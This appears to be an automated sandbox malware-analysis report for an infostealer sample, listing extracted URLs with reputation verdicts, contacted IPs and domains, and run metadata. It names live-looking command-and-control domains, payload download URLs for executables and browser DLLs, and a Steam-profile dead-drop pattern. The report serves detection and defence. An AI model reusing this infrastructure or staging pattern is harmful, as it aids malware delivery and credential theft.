                                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeRegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0file.exe, 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://5.75.211.162/sqlp.dllBRegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://5.75.211.162/sqlp.dllVRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://s.ytimg.com;RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://fragnantbui.shop/RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://steamcommunity.com/profiles/76561199780418869.RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGPRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://stogeneratmns.shop/RegAsm.exe, 00000008.00000002.2501224995.0000000000CAA000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://cowod.hoptoFIEHJDBRegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.entrust.net/rpa03file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=IDHIEB.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.ecosia.org/newtab/IDHIEB.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • URL Reputation: malware
                                                            unknown
                                                            https://www.youtube.com/RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://5.75.211.162AEBFCRegAsm.exe, 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.google.com/recaptcha/RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesDAAFII.11.dr, GIEHJK.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://stogeneratmns.shop/api1RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://crl.entrust.net/2048ca.crl0file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://5.75.211.162aRegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://help.steampowered.com/en/RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://5.75.211.162/gRegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://stogeneratmns.shop:443/apiRegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://steamcommunity.com/profiles/76561199780418869/inventory/RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://5.75.211.162/mozglue.dllXRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&aRegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://steamcommunity.com/LRegAsm.exe, 00000002.00000002.2452955008.00000000007CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://drawzhotdog.shop:443/api:RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://fragnantbui.shop:443/apiRegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://5.75.211.162/:3#RegAsm.exe, 0000000B.00000002.2823050611.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://5.75.211.162/freebl3.dlllRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://reinforcenh.shop/apiORegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://steamcommunity.com/IRegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://147.45.44.104AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://crl.entrust.net/ts1ca.crl0file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://steamcommunity.com/workshop/RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://login.steampowered.com/RegAsm.exe, 00000008.00000002.2501224995.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://store.steampowered.com/legal/RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniURDPWInst.exe, 00000013.00000000.2436607215.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoIDHIEB.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://reinforcenh.shop/.itbRegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://steamcommunity.com/login/home/?goto=profiles%2F7656119978041886976561199780418869[1].htm.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://aia.entrust.net/ts1-chain256.cer01file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://store.steampowered.com/76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://hansgborn.euAFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://5.75.211.1620.5938.132RegAsm.exe, 0000000B.00000002.2820883103.0000000000563000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.steampowered.com/RegAsm.exe, 00000008.00000002.2501224995.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://store.steampowered.com/mobileRegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishRegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://api.ipify.orgdAFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://cowod.hopto.orgRegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://hansgborn.eudAFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            8.46.123.33
                                                            unknownUnited States
                                                            62713AS-PUBMATICUStrue
                                                            147.45.44.104
                                                            unknownRussian Federation
                                                            2895FREE-NET-ASFREEnetEUfalse
                                                            45.132.206.251
                                                            cowod.hopto.orgRussian Federation
                                                            59731LIFELINK-ASRUtrue
                                                            172.67.208.139
                                                            reinforcenh.shopUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            104.21.4.136
                                                            gutterydhowi.shopUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            188.114.97.3
                                                            ghostreedmnu.shopEuropean Union
                                                            13335CLOUDFLARENETUStrue
                                                            172.67.162.108
                                                            drawzhotdog.shopUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            239.255.255.250
                                                            unknownReserved
                                                            unknownunknownfalse
                                                            172.67.128.144
                                                            ballotnwu.siteUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            104.21.36.139
                                                            wallkedsleeoi.shopUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            188.114.96.3
                                                            fragnantbui.shopEuropean Union
                                                            13335CLOUDFLARENETUStrue
                                                            104.102.49.254
                                                            steamcommunity.comUnited States
                                                            16625AKAMAI-ASUStrue
                                                            104.26.13.205
                                                            api.ipify.orgUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            5.75.211.162
                                                            unknownGermany
                                                            24940HETZNER-ASDEtrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1519759
                                                            Start date and time:2024-09-27 00:13:07 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 10m 58s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:49
                                                            Number of new started drivers analysed:3
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:file.exe
                                                            Detection:MAL
                                                            Classification:mal100.spre.troj.spyw.evad.winEXE@63/43@16/14
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 99%
                                                            • Number of executed functions: 97
                                                            • Number of non-executed functions: 217
